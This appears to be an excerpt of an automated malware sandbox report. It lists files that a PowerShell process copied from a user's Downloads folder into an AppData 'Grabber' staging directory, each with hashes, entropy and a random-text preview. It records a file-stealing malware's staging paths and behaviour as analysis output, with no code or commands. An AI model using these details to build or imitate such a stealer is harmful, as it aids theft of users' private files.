                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\GLTYDMDUST.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69569301223482
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
                                                                                      MD5:CA404BEA65D84F58838AF73B2DC67E02
                                                                                      SHA1:56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
                                                                                      SHA-256:4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
                                                                                      SHA-512:10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\GRXZDKKVDB.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\KLIZUSIQEN.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\KLIZUSIQEN.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\NVWZAPQSQL.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6998645060098685
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\NYMMPCEIMA.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696508269038202
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\QCOILOQIKC.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697125102277996
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                                                      MD5:207485EFCE70435971C31586A1E4CF97
                                                                                      SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                                                      SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                                                      SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
